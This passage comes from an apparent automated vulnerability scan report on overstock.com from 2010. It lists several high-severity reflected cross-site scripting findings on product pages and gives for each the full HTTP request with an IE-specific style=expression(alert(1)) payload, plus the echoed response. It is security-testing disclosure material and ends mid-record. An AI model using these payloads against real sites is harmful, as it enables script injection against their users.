GET /Gifts-Flowers/Large-35-x-46-Super-Value-Dog-Pet-Bed/2897134/product.html?ee5f8"style%3d"x%3aexpression(alert(1))"73f60b7f756=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:10 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2897134|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408890614:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="ee5f8"style="x:expression(alert(1))"73f60b7f756" value="1"/>
...[SNIP]...

2.111. http://www.overstock.com/Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5879"style="x:expression(alert(1))"060fcf6f53d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Large-40-inch-Round-Padded-edge-Dog-Bed/2682544/product.html?f5879"style%3d"x%3aexpression(alert(1))"060fcf6f53d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:41 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2682544|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408861002:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="f5879"style="x:expression(alert(1))"060fcf6f53d" value="1"/>
...[SNIP]...

2.112. http://www.overstock.com/Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1c372"style="x:expression(alert(1))"e683909a5d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Large-Memory-Foam-Dog-Bed-with-Microfiber-Cover/3053907/product.html?1c372"style%3d"x%3aexpression(alert(1))"e683909a5d6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:41 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408860979:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: mxcproclicks=3053907|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:41 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=15
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>La
...[SNIP]...
<input type="hidden" name="1c372"style="x:expression(alert(1))"e683909a5d6" value="1"/>
...[SNIP]...

2.113. http://www.overstock.com/Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ceb88"style="x:expression(alert(1))"e4019be7cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/PetGear-Auto-Carrier-and-Kennel/3320338/product.html?ceb88"style%3d"x%3aexpression(alert(1))"e4019be7cd=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:00 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3320338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:00 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408880023:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111430

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="ceb88"style="x:expression(alert(1))"e4019be7cd" value="1"/>
...[SNIP]...

2.114. http://www.overstock.com/Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e038a"style="x:expression(alert(1))"cd012eeeaa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Sweet-Selections-Gourmet-Gift-Basket/3452453/product.html?e038a"style%3d"x%3aexpression(alert(1))"cd012eeeaa7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:58 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:58 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408878442:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3452453|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:58 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:58 GMT; Path=/
Keep-Alive: timeout=5, max=24
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Sw
...[SNIP]...
<input type="hidden" name="e038a"style="x:expression(alert(1))"cd012eeeaa7" value="1"/>
...[SNIP]...

2.115. http://www.overstock.com/Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98463"style="x:expression(alert(1))"3f7e759d8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Universal-Fit-Seat-Cover/1433549/product.html?98463"style%3d"x%3aexpression(alert(1))"3f7e759d8e0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:38 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408858839:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:38 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1433549|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:38 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108937

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Un
...[SNIP]...
<input type="hidden" name="98463"style="x:expression(alert(1))"3f7e759d8e0" value="1"/>
...[SNIP]...

2.116. http://www.overstock.com/Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ec0"style="x:expression(alert(1))"e89bccefc7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Universal-Waterproof-Hammock-Back-Seat-Cover/3450019/product.html?13ec0"style%3d"x%3aexpression(alert(1))"e89bccefc7f=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:15 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:15 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408895139:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3450019|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:15 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:15 GMT; Path=/
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110383

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Un
...[SNIP]...
<input type="hidden" name="13ec0"style="x:expression(alert(1))"e89bccefc7f" value="1"/>
...[SNIP]...

2.117. http://www.overstock.com/Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7251a"style="x:expression(alert(1))"9cd48544d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Zack-Zoey-Soft-Red-Dog-Sweatshirt/3906673/product.html?7251a"style%3d"x%3aexpression(alert(1))"9cd48544d0e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:48 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408868406:ccid^144812; Domain=.overstock.com; Path=/
